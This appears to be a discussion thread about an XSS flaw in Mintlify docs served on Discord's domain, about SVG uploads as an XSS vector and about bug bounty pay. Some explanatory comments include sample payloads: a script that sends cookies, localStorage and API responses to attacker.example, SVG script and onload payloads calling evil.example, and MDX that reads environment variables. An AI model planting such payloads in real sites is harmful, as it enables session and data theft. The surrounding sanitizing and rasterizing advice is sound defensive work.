XSS is not dead, and the web platform's mitigations (setHTML, Trusted Types) are not a panacea. CSP helps but is often configured poorly.
So, this kind of widespread XSS in a vulnerable third party component is indeed concerning.
For another example, there have been two reflected XSS vulns found in Anubis this year, putting any website that deploys it and doesn't patch at risk of JS execution on their origin.
Audit your third-party dependencies!
https://github.com/TecharoHQ/anubis/security/advisories/GHSA...
https://github.com/TecharoHQ/anubis/security/advisories/GHSA...
Anubis is promoting itself as a sort of Cloudflare-esque service to mitigate AI scraping. They also aren't just an open-source project relying on gracious donations; there's a paid white-label version of the project.
If anything, Anubis should probably be held to a higher standard, given that many more vulnerable people rely on it than on big corporations (vulnerable in the sense that an XSS on their site could mean fishing it out of spam filters and/or eating bandwidth-exhaustion costs out of their own wallet). Same reason that a bug in some random GitHub project somewhere probably has an impact of near zero, but a critical security bug in nginx means the shit has hit the fan. When you write software that has a massive audience, you're going to be held to higher standards (if not legally, at least socially).
Not that Anubis' handling of this seems to be bad or anything; both XSS attacks were mitigated, but "won't somebody think of the poor FOSS project" isn't really the right answer here.
The vulnerabilities that command real dollars all have half-lives, and can't be fixed with a single cluster of prod deploys by the victims.
In the end, you are trying to encourage people not to fuck with your shit, instead of playing economic games. Especially with a bunch of teenagers who wouldn't even be fully criminally liable for doing something funny. $4K isn't much today, even for a teenager. Thanks to stupid AI shit like Mintlify, that's like worth 2GB of RAM or something.
It's not just compensation, it's a gesture. And really bad PR.
This is very sad because SVGs often have way smaller file sizes, and obviously look much better at various scales. If only there were a widely used vector format that does not have any script support and can be easily shared.
The only reliable solution would be an allowlist of safe elements and attributes, but it would quickly cause compat issues unless you spend time curating the rules. I did not find an existing lib doing it at the time, and it was too much effort to maintain it ourselves.
The solution I ended up implementing was a sandboxed Chromium instance, driven over the DevTools protocol, to load the SVG and rasterize it. Users could still upload SVG files, but they were served to other users as rasterized PNGs.
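Roughly, that setup looks like this (a minimal sketch using Puppeteer, which drives headless Chromium over the DevTools protocol; the function name and options are illustrative, not the original code):

    import puppeteer from 'puppeteer';

    // Load an untrusted SVG in headless Chromium with scripting disabled,
    // screenshot the rendered <svg> element, and return PNG bytes.
    async function rasterizeSvg(svgSource: string, width = 512, height = 512) {
      const browser = await puppeteer.launch({ headless: true });
      try {
        const page = await browser.newPage();
        await page.setJavaScriptEnabled(false); // belt and braces: no script execution in the page
        await page.setViewport({ width, height });
        await page.setContent(svgSource, { waitUntil: 'load' });

        const element = await page.$('svg');
        if (!element) throw new Error('no <svg> root element found');
        return await element.screenshot({ type: 'png', omitBackground: true });
      } finally {
        await browser.close();
      }
    }

In practice you'd also want the browser process itself locked down (container, no network), since you're still feeding attacker-controlled content to a full rendering engine.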
(Yes I'm still salty about Flash.)
That wasn't the only reason. Flash was also proprietary, and opaque, and single-vendor, among many other problems with it.
Do you allow SVGs to be uploaded anywhere on your site? This is a PSA that you're probably at risk unless you can find the few hundred lines of code doing the sanitization.
Note to Ruby on Rails developers: SVGs uploaded via Active Storage are not sanitized by default.
Didn’t we do this already with Flash? Why would this lesson not have stuck?
It’s so regular, like clockwork, that it has to be a nation state doing this to us.
1: https://owasp.org/www-community/vulnerabilities/XML_External...
This is also why an `app.` or even better `tenant.` subdomain is always a good idea; it limits the blast radius of mistakes like this.
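To make the blast radius concrete: the same-origin policy is scoped to scheme + host + port, not to a path, so script injected under any path of the main domain runs with that origin's full authority. A rough illustration (the storage key, API path, and exfiltrate helper are all hypothetical):

    // Hypothetical payload running from an injected <script> anywhere under
    // https://example.com/ (e.g. a /docs/ path served by a third party):
    const exfiltrate = (data: unknown) =>
      navigator.sendBeacon('https://attacker.example/collect', JSON.stringify(data));

    exfiltrate(document.cookie);                  // any cookie not marked HttpOnly
    exfiltrate(localStorage.getItem('session'));  // origin-scoped storage (hypothetical key)

    // Credentialed call to a first-party API on the same origin (hypothetical path):
    fetch('/api/users/@me', { credentials: 'include' })
      .then(r => r.json())
      .then(exfiltrate);

    // Served from docs.example.com instead, the same payload would only see that
    // subdomain's cookies and storage, and could not ride the user's main-site session.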
I've never heard an XSS vulnerability described as a supply-chain attack before, though; usually that term is reserved for malicious scripts in package managers or companies putting backdoors in hardware.
If I recall correctly, last week Mintlify wrote a blog post showcasing their impressive(ly complicated) caching architecture, pretending like they were doing real engineering. It turns out nobody there seems to know what they're doing, but they've managed to convince some big names to use them.
Man, it's like everything I hate about modern tech. Good job Eva for finding this one. Starting to think that every AI startup or company that is heavily using gen-ai for coding is probably extremely vulnerable to the simplest of attacks. Might be a way to make some extra spending money lol.
But like, this case isn't really a dependency or supply-chain attack. It's just allowing remote code execution because, idk, the dev who implemented it didn't read the manual and see that MDX can execute arbitrary code, or something. Or maybe they vibe coded it, saw it worked, and didn't bother to check. Perhaps the supply-chain angle is that Discord et al. chose to use Mintlify; if that's what you meant, then I apologize.
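To spell out the "MDX can execute arbitrary code" part: MDX isn't a data format, it compiles to a JavaScript module, so rendering an untrusted doc means running whatever the author put in it. A rough sketch with @mdx-js/mdx (illustrative only, not Mintlify's actual pipeline):

    import { compile } from '@mdx-js/mdx';

    // An attacker-controlled "documentation page": MDX lets it mix arbitrary
    // JavaScript (exports, expressions) with the markdown.
    const untrustedDoc = `
    export const env = Object.keys(globalThis.process?.env ?? {}).join(', ');

    # Totally normal docs page

    Build environment variables: {env}
    `;

    const compiled = await compile(untrustedDoc);
    // The output is a complete ES module. Statically pre-rendering this page
    // means executing the attacker's code wherever that rendering happens.
    console.log(String(compiled));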
I think you're right that I have an extreme aversion to SFBA-style software development, partly because of how gen-AI is used there.
Companies will create bug bounty programs where they set ground rules (like no social engineering), and have guides on how to identify yourself as an ethical hacker, for example:
Unfortunately a competitive rate agreed to in advance with a company before we do any pentesting is the only way we have ever been able to get paid fairly for this sort of work. Finding bugs in the wild as this researcher did often gets wildly underpaid relative to the potential impact of the bug, if they pay or take it seriously at all.
These companies should be ashamed paying out so little for this, and it is only a matter of time before they insult the wrong researcher who decides to pursue paths to maximum profit, or maximum damage, with a vuln like this.
Ok, you got "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma..." to send a controlled payload
But regular users will never hit "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma...", so they will never execute your script
I fail to understand how this can be exploited, by whom, and under what conditions.
Apparently one of the other linked posts shows how you can also gain RCE, since the docs are statically pre-rendered and there’s no sandboxing to prevent you from evalling arbitrary JavaScript.
I have a friend who at one point had five monitors and 2 computers (actually it might be 3) on his desk and maybe he’s the one doing it right. He keeps his personal stuff and his programming/work stuff completely separate.
Mintlify security is the worst I have ever encountered in a modern SaaS company.
They will leak your data, code, assets, etc. They will know they did this. You will tell them, they will acknowledge that they knew it happened, and didn't tell you.
Your docs site will go down, and you will need to page their engineers to tell them it's down. This will be a surprise to them.
Found by a 16 year old, what a legend.
Also, as someone who maintains a file upload pipeline, I run every SVG through a sanitizer. Tools like DOMPurify remove scripts and enforce a safe subset of the spec. I even go as far as rasterizing user-uploaded vectors to PNG when possible.
However, the bigger issue is a mental one: most folks treat SVG like a dumb image, while browsers treat it like executable content. Until the platform changes that expectation, there will always be an attack surface.
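For anyone who wants to copy the sanitizer step, here's a minimal sketch of the DOMPurify approach mentioned above, run server-side with jsdom; the payloads are just examples of SVGs that render as "dumb images" but carry script:

    import { JSDOM } from 'jsdom';
    import createDOMPurify from 'dompurify';

    // DOMPurify needs a DOM implementation when run server-side; jsdom provides one.
    const window = new JSDOM('').window;
    const DOMPurify = createDOMPurify(window);

    // Illustrative payloads: files that render as plain images but execute script.
    const payloads = [
      `<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script><rect width="10" height="10"/></svg>`,
      `<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('//evil.example')"><circle r="5"/></svg>`,
    ];

    for (const dirty of payloads) {
      // Restrict output to the SVG profile; <script> elements and event-handler
      // attributes like onload are stripped.
      const clean = DOMPurify.sanitize(dirty, {
        USE_PROFILES: { svg: true, svgFilters: true },
      });
      console.log(clean);
    }

Rasterizing afterwards, as described above, catches whatever a filter-based approach misses.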
Pathetic for a senior SE, but pretty awesome for a 16-year-old up-and-coming hacker.
I agree $4,000 is way too low, but a $400k salary is really high, especially for security work.